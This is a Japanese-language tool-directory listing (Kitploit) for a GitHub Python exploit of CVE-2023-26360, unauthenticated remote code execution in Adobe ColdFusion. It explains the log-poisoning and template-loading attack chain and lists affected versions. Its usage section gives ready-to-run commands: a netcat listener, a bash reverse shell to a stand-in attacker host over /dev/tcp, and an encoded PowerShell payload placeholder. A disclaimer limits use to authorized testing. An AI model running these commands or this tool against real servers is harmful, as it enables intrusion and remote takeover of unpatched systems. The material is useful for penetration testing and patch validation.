Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Adobe_ColdFusion_RCE_Unauthenticated — このエクスプロイトはCVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) に基づいており、Metasploitモジュールとjakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploitを基に構築されています。 | Kitploit
ツール/GitHubGitHub/joaoaugustom/adobe_coldfusion_rce_unauthenticated
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubjoaoaugustom/adobe_coldfusion_rce_unauthenticated

Adobe_ColdFusion_RCE_Unauthenticated

このエクスプロイトはCVE-2023-26360 (https://nvd.nist.gov/vuln/detail/CVE-2023-26360) に基づいており、Metasploitモジュールとjakabakos/CVE-2023-26360-adobe-coldfusion-rce-exploitを基に構築されています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
12ヶ月前未レビュー

CVE-2023-26360 — Adobe ColdFusion の未認証RCE

CVE-2023-26360 のリモートコード実行エクスプロイトの Python 実装です。元の Metasploit モジュール の解析と jakabakos の先行研究に基づいています。

なぜこれが存在するのか

jakabakos の PoC は、<cfexecute> を直接 _variables パラメーターに注入し、その出力を ColdFusion ログから一度に読み取ろうとします。しかし、ColdFusion はそのコンテキストで CFML タグをインライン評価しないため、このアプローチは失敗し、コード実行に至らず 500 エラーが発生します。

本実装は、Metasploit モジュールで使用されている正しい2段階のメカニズムを再現しています。

  1. ログポイズニング — 破損した _variables ペイロード({<cftry>CFML</cftry>)を脆弱な CFC エンドポイントに送信します。ColdFusion はこれを解析できず、CFML コードを含む生の内容を coldfusion-out.log に書き込みます。
  2. テンプレート実行 — クラス名のデシリアライゼーションの脆弱性を利用して、ポイズニングされたログファイルを ColdFusion テンプレートとして読み込み、サーバーに注入された CFML を実行させます。

コマンド実行は、createObject を介して java.lang.Runtime.exec() を使用して行われ、<cfexecute> への依存を排除しています。<cfexecute> は通常、強化された環境や本番環境では無効にされています。

影響を受けるバージョン

  • Adobe ColdFusion 2021 Update 5 以前
  • Adobe ColdFusion 2018 Update 15 以前

必要条件

root@kitploit:~
pip install -r requirements.txt

使用方法

エクスプロイトを実行する前にリスナーを起動してください。

root@kitploit:~
nc -lvnp 4444

Windows ターゲット:

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "powershell -e <BASE64_PAYLOAD>"

Linux ターゲット:

root@kitploit:~
python exploit.py --host http://TARGET:8500 --cmd "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

プロキシ経由(例: Burp Suite):

root@kitploit:~
python exploit.py --host http://TARGET:8500 --win --cmd "whoami" --proxy http://127.0.0.1:8080

オプション

フラグ説明
--hostターゲットのベースURL(例: )

動作の仕組み

root@kitploit:~
┌─────────────┐         Step 1: plant CFML          ┌──────────────────┐
│   Attacker  │ ──── POST /_variables={<cftry>...  ──► iedit.cfc        │
│             │      CF fails to parse, logs CFML     │                  │
│             │                                       │ coldfusion-      │
│             │         Step 2: trigger execution     │ out.log          │
│             │ ──── POST classname=X..\logs\cf... ──► (loaded as       │
│             │                                       │  CFML template)  │
│  Listener   │ ◄─────────────── reverse shell ───────│                  │
└─────────────┘                                       └──────────────────┘

参考情報

  • Adobe セキュリティアドバイザリ
  • Rapid7 分析 — AttackerKB
  • Metasploit モジュール
  • jakabakos PoC

免責事項

このツールは教育目的および許可されたセキュリティ評価(侵入テスト、CTF、ラボ環境)のためにのみ提供されています。明示的な書面による許可なくこのエクスプロイトをシステムに対して実行することは違法です。作成者は不正使用に対する一切の責任を負いません。

ツールをダウンロード
http://192.168.1.10:8500
--cmdターゲット上で実行するコマンド
--winターゲットが Windows ホストの場合に設定
--proxyオプションの HTTP プロキシ URL